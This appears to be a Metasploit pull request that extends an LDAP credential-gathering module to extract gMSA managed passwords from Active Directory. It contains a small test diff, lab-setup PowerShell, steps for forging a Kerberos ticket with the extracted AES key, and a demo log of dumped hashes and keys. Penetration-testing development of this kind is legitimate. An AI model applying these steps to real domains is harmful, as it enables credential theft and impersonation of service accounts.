### PR TITLE
Add gMSA Secret Extraction From LDAP

### DIFF
--- a/spec/acceptance/ldap_spec.rb
+++ b/spec/acceptance/ldap_spec.rb
@@ -67,8 +67,8 @@ RSpec.describe 'LDAP modules' do
                 /Searching base DN: DC=ldap,DC=example,DC=com/,
                 /Checking if the target LDAP server is an Active Directory Domain Controller.../,
                 /The target LDAP server is not an Active Directory Domain Controller./,
-                /Credentials \(password\) found in ms-mcs-admpwd: Administrator:\[LAPSv1\]SuperSecretPassword!/,
-                /Credentials \(password\) found in mslaps-password: Administrator:\[LAPSv2\]SuperSecretPassword!/,
+                /Credential found in ms-mcs-admpwd: Administrator:\[LAPSv1\]SuperSecretPassword!/,
+                /Credential found in mslaps-password: Administrator:\[LAPSv2\]SuperSecretPassword!/,
                 /Found [1-9]\d* entries and [1-9]\d* credentials in 'DC=ldap,DC=example,DC=com'./
               ]
             }


### PR DESCRIPTION
This updates the existing `auxiliary/gather/ldap_passwords` module to search for and extract gMSA credentials from AD Domain Controllers. These credentials can then be used to authenticate as the service account.

## Verification

- [x] Setup a gMSA account on a domain controller (see the included Powershell code)
- [x] Start `msfconsole`
- [x] `use auxiliary/gather/ldap_passwords`
- [x] Set the options as appropriate to target the DC, authenticate as an account that has access to the gMSA account but not the gMSA account itself (see step 5 of the "gMSA Setup" section below for configuring who has access)
- [x] Set `SSL` to true and RPORT to 636 so the module is run with SSL (the `msDS-ManagedPassword` attribute is only readable over LDAPS)
- [x] Run the module and see that the secrets were extracted
- [x] Use one of the AES keys with the `auxiliary/admin/kerberos/get_ticket` to obtain a TGT as the service account, showing the secret is correct and you now have access to authenticate as the account

### gMSA Setup

Run this with DA privilges on the DC to setup a gMSA account. The gMSA account will be named `Jabberwock$`. It adds the current user and the current computer as account with privileges to read the secret.
```powershell
# Step 1: Create KDS root key
Add-KdsRootKey -EffectiveTime (Get-Date).AddHours(-10)

# Step 2: Create security group
New-ADGroup -Name "JabberwockUsers" -GroupScope Global -GroupCategory Security

# Step 3: Add computer accounts to the group
Add-ADGroupMember -Identity "JabberwockUsers" -Members "$env:COMPUTERNAME$"

# Step 4: Create the gMSA
New-ADServiceAccount -Name "Jabberwock" -DNSHostName "jabberwock.msflab.local" -PrincipalsAllowedToRetrieveManagedPassword "JabberwockUsers"

# Step 5: Set direct computer access
Set-ADServiceAccount -Identity "Jabberwock" -PrincipalsAllowedToRetrieveManagedPassword @( "$env:COMPUTERNAME$", "$env:USERNAME" )

# Step 6: Install the gMSA
Install-ADServiceAccount -Identity "Jabberwock"

# Step 7: Test the installation
Test-ADServiceAccount -Identity "Jabberwock"
```

## Demo

```
msf6 auxiliary(gather/ldap_passwords) > run
[*] Discovered base DN: DC=msflab,DC=local
[*] The target LDAP server is an Active Directory Domain Controller.
[*] Searching base DN: DC=msflab,DC=local
[+] Credential found in msds-managedpassword: Jabberwock$::aad3b435b51404eeaad3b435b51404ee:7bb82abf0d8bd125cdbf7d3abe0c4c88::: 
[+] Credential found in msds-managedpassword: Jabberwock$:aes256-cts-hmac-sha1-96:53baddba683f8bcbb98b648da308b79f7388fa76a5c9a1f4c7bda31a5a7ad975 
[+] Credential found in msds-managedpassword: Jabberwock$:aes128-cts-hmac-sha1-96:d2c27c26ee902176f4c53aa8a300d5ef 
[*] Found 1 entries and 1 credentials in 'DC=msflab,DC=local'.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(gather/ldap_passwords) >
```